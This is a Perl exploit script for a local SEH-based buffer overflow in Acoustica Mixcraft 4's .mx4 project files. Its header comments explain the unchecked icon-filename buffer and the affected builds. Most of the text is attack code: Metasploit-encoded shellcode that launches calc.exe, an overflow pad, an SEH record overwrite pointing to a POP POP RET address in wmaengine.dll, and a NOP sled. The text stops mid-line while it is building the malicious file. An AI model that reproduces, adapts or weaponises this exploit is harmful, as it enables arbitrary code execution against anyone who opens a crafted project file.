1 #!/usr/bin/perl
2 #
3 # Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit
4 # Author: Koshi
5 #
6 # Date: 08−28−08 ( 0day )
7 # Application: Acoustica Mixcraft
8 # Version(s): (Possibly Older) / 4.1 Build 96 / 4.2 Build 98
9 # Site: http://acoustica.com/mixcraft/download.htm
10 # Tested On: Windows XP SP3 Fully Patched
11 #
12 # A vulnerability exists in an unchecked buffer located in the
13 # project files (.mx4) for Acoustica Mixcraft4. The buffer should
14 # contain the file name of an image located in
15 # "C:\Program Files\Acoustica Mixcraft 4\mixrez\icons" on a default
16 # install of Mixcraft, and would be used as the icon for a specific
17 # "track" or "instrument" in Mixcraft.
18 #
19 # gr33tz: Rima my baby, str0ke, breaker_unit, mess’, and my dude who
20 # showed me this nifty program.
21 #
22
23
24 # win32_exec − EXITFUNC=process CMD=calc.exe Size=165 Encoder=ShikataGaNai http://metasploit.com
25 my $shellcode =
26 "\xdd\xc3\xd9\x74\x24\xf4\x5b\x29\xc9\xb8\x1f\xb4\xe6\x18\xb1\x24".
27 "\x83\xeb\xfc\x31\x43\x13\x03\x5c\xa7\x04\xed\x9e\x2f\x8c\x0e\x5e".
28 "\xb0\x86\x4a\x62\x3b\xe4\x51\xe2\x3a\xfa\xd1\x5d\x25\x8f\xb9\x41".
29 "\x54\x64\x0c\x0a\x62\xf1\x8e\xe2\xba\xc5\x08\x56\x38\x05\x5e\xa1".
30 "\x80\x4c\x92\xac\xc0\xba\x59\x95\x90\x18\xa6\x9c\xfd\xea\xf9\x7a".
31 "\xff\x07\x63\x09\xf3\x9c\xe7\x52\x10\x22\x13\xe7\x34\xaf\xe2\x1c".
32 "\xcd\xf3\xc0\xe6\x0d\x3a\xc9\x82\x1a\x7d\xf9\xcf\xdd\x06\xf5\x44".
33 "\x9d\xfa\x8e\x2a\x02\xae\x1a\xa2\x32\x5b\x15\xb9\xc3\x2b\x26\xbd".
34 "\xc3\xc0\x4f\x81\x9c\xe7\x79\x99\x74\x81\x7e\xda\xb9\xea\x2e\xb4".
35 "\x47\xd5\x2d\x37\xd0\x7d\x4f\x3d\x2e\x29\x4f\xa6\x4c\xb4\xc3\x4b".
36 "\xbd\x53\x64\xee\xc1";
37
38 my $bof = "A"x324;
39 my $sled = "\x90"x35;
40 my $fill = "\x90"x468;
41 my $buff = "".
42
"$bof".
43
"\xeb\x06\x90\x90". ### Pointer to next SEH record (Boing!)
###
44
"\x28\x12\x8b\x01". ### SE handler 0x018b1228 ( wmaengine.dll POP POP RET ) ###
45
"$sled".
46
"$shellcode".
47
"$fill";
48
49 my $tuff = "".
50
"\x52\x49\x46\x46\xC4\x0F\x00\x00\x